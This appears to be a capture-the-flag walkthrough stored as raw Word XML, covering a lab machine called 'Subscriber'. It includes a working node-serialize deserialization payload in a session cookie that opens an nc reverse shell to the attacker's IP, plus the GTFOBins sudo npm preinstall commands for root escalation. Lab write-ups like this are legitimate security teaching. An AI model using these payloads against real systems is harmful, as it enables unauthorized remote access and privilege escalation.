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SUBSCRIBER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bxse89esjs11"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5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two open web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3000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After analysis, we verified that it is a completely static page, indicating that the web application on port 80 is inactive. The developers mention that an application was deployed on port 3000.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investigate further.</w:t>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on port 3000, we encounter a field where we can enter an email address to subscribe.</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providing an email address, we are redirected to a thank-you page for subscribing. One interesting detail is that after providing an email, a session cookie was created.</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5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appears to be a Base64-encoded JSON; we can decode it:</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358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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cookie vulnerabilities in Node.js, I found a website discussing the insecure deserialization vulnerability.</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Node.js Deserialization Attack | Exploit Notes</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Node.js deserialization is vulnerable to remote command execution.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://exploit-notes.hdks.org/exploit/web/security-risk/nodejs-deserialization-attack/</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develop an exploit to leverage this possible vulnerability, as indicated in the link mentioned above:</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let y = {</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rce: function() {</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require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;ip-vpn&gt; &lt;local-port&gt; &gt;/tmp/f',</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function(error, stdout, stderr) { console.log(stdout); });</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let serialize = require('node-serialize');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console.log("Serialized: \n" + serialize.serialize(y));</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5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edit our cookie directly in Burp Suite’s Decoder (or any tool of your preference).</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5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cookie will look like this:</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{"userName":"Anonymous","Email":"_$$ND_FUNC$$_function() {\n require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.11.123 4444 &gt;/tmp/f', function(error, stdout, stderr) { console.log(stdout); });\n }()"}</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must not forget to add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at the end of the payload so that the function is invoked. With this completed, we only need to encode it in Base64, and our malicious cookie will be ready.</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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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with our malicious cookie, we receive the connection.</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5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j6hvixxe39pp"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358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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ufa2xt3tt09x" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to a fully interactive TTY:</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can retrieve the first flag.</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05200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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our final flag. For this, we must escalate to the root user.</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notice that we have the ability to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/npm *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with root privileges without needing to provide a password.</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7200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins</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npm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can be used to break out from restricted environments by spawning an interactive system shell.</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hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/npm/#sudo</w:t>
        </w:r>
      </w:hyperlink>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escalate our privileges by executing the commands below:</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TF=$(mktemp -d)</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'{"scripts": {"preinstall": "/bin/sh"}}' &gt; $TF/package.json</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npm -C $TF --unsafe-perm i</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this, we obtain our final flag located in the root user’s directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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4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4">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59"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Subscriber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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/npm/#sudo"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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit-notes.hdks.org/exploit/web/security-risk/nodejs-deserialization-attack/" TargetMode="External"/><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OCyV0YXw+exOZBENO8bfKx+UA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmJ4c2U4OWVzanMxMTIOaC5qNmh2aXh4ZTM5cHAyDmgudWZhMnh0M3R0MDl4Mg5oLjE3NWY1Y3M5NHowbzgAciExLXF3ZGs0WUtEWjZ5STNEZUJrNnNjUW40dEloci1KV1M=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